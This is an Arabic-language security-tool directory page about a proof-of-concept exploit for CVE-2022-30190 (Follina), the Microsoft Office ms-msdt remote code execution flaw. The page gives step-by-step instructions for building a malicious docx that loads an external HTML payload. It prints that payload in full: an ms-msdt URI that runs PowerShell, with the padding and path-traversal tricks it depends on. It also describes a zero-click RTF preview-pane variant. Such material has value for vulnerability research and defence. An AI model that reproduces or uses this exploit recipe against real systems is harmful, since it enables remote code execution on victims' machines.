Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/wysiiwyg/poc-cve-2022-30190
تحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمتطوير الحمولات
GitHubwysiiwyg/poc-cve-2022-30190

PoC-CVE-2022-30190

استغلال إثبات المفهوم لثغرة CVE-2022-30190 (Follina)، يوضح تنفيذ التعليمات البرمجية عن بُعد عبر مستندات Microsoft Office مُصمَّمة خصيصًا باستخدام معالج URI الخاص بـ ms-msdt.

عرض المستودع
122منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2022-30190 : ثغرة 0-day في MS Offic RCE والمعروفة باسم msdt follina

معلومة : ثغرة 0-day جديدة في Microsoft Office تُستخدم في هجمات لتنفيذ PowerShell

ملخص

في 29 مايو 2022، اكتشف فريق Nao_Sec، وهو فريق مستقل لأبحاث الأمن السيبراني، مستند Office ضارًا تمت مشاركته على Virustotal. يستخدم هذا المستند مخططًا غير معتاد لكنه معروف لإصابة ضحاياه. لم يتم اكتشاف المخطط كخبيث بواسطة بعض حلول EDR، مثل Microsoft Defender for Endpoint. يمكن أن تؤدي هذه الثغرة إلى تنفيذ التعليمات البرمجية دون الحاجة إلى تفاعل المستخدم، حيث أنها لا تتضمن وحدات ماكرو، إلا إذا كان وضع العرض المحمي (Protected View) ممكّنًا. لم يُنسب رقم CVE حتى الآن.

التفاصيل التقنية

يتم استغلال الثغرة باستخدام مخطط URI الخاص بـ MSProtocol لتحميل بعض التعليمات البرمجية. يمكن للمهاجمين تضمين روابط خبيثة داخل مستندات Microsoft Office أو القوالب أو رسائل البريد الإلكتروني تبدأ بـ ms-msdt: والتي سيتم تحميلها وتنفيذها بعد ذلك دون تفاعل المستخدم

  • إلا إذا كان وضع العرض المحمي (Protected View) ممكّنًا. ومع ذلك، فإن تحويل المستند إلى تنسيق RTF يمكنه أيضًا تجاوز ميزة العرض المحمي.

إثبات المفهوم

يمكن أن تحتوي ملفات MS Office docx على مراجع كائنات OLE خارجية كملفات HTML. يوجد مخطط HTML "ms-msdt:" يستدعي أداة التشخيص msdt، وهي قادرة على تنفيذ تعليمات برمجية عشوائية (محددة في المعاملات).

النتيجة هي ناقل هجوم مرعب للحصول على RCE من خلال فتح ملفات docx خبيثة (دون استخدام وحدات ماكرو).

فيما يلي خطوات بناء مستند docx لإثبات المفهوم:

  1. افتح Word (استُخدم الإصدار المحدّث 2019 Pro، 16.0.10386.20017)، وأنشئ مستندًا تجريبيًا، وأدرج كائن (OLE) (كصورة نقطية Bitmap Image)، واحفظه بصيغة docx.

  2. حرّر word/_rels/document.xml.rels في بنية docx (وهي ملف zip عادي). عدّل وسم XML <Relationship> مع السمة

root@kitploit:~
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

وTarget="embeddings/oleObject1.bin" عن طريق تغيير قيمة Target وإضافة السمة TargetMode:

root@kitploit:~
Target = "http://<payload_server>/payload.html!"
TargetMode = "External"

لاحظ قيمة Id (غالبًا ما تكون "rId5").

  1. حرّر word/document.xml. ابحث عن وسم <o:OLEObject ..> (مع r:id="rId5") وغيّر السمة من Type="Embed" إلى Type="Link" وأضف السمة UpdateMode="OnCall".

ملاحظة: ملف docx الخبيث الذي تم إنشاؤه هو تقريبًا نفس الملف الخاص بـ CVE-2021-44444.

  1. قدّم الحمولة html الخاصة بـ PoC (مشغّل calc.exe) باستخدام مخطط ms-msdt على http://<payload_server>/payload.html:
root@kitploit:~
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times
  window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
</script>

</body>
</html>

لاحظ ما يلي:

  • يجب تكرار سطر التعليق الذي يحتوي على AAA أكثر من 60 مرة (بحد أدنى 4096 بايت).
  • كان مطلوبًا اجتيازا دليلين على الأقل /../ في بداية معامل IT_BrowseForFile
  • التعليمات البرمجية الموضوعة داخل $() سيتم تنفيذها عبر PowerShell، لكن المسافات قد تكسرها
  • يجب أن تكون “.exe” آخر سلسلة نصية في نهاية معامل IT_BrowseForFile

بالإضافة إلى ذلك، يمكن للحمولة المُشغِّلة الاتصال بمواقع بعيدة. وفي حين أنه من غير المرجح أن تستدعي ملفًا ثنائيًا غير موثوق، فإن الاتصال سيظل يحمل تجزئات NTLM (مما يعني أن المهاجمين أصبح لديهم الآن تجزئة لكلمة مرور Windows الخاصة بالضحية) والتي يمكن أن يستخدمها الخصم لمزيد من الاستغلال بعد الاختراق.

إضافة (نسخة RTF بدون نقر)

إذا أضفت أيضًا هذه العناصر تحت عنصر <o:OLEObject> في word/document.xml في الخطوة 3:

root@kitploit:~
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>

فإنها ستعمل أيضًا كملف RTF (افتح ملف docx الناتج واحفظه بصيغة RTF).

مع RTF، لا حاجة لفتح الملف في Word، بل يكفي تصفح الملف والنظر إليه في جزء المعاينة. يقوم جزء المعاينة بتشغيل الحمولة HTML الخارجية ويحدث RCE دون أي نقرات.

المصادر :

  • https://nao-sec.org/about
  • https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection
  • https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 (الكود الأصلي)
  • https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
  • https://github.com/sinjap/PoC-CVE-2022-30190 (معلومات إضافية)
تنزيل الأداة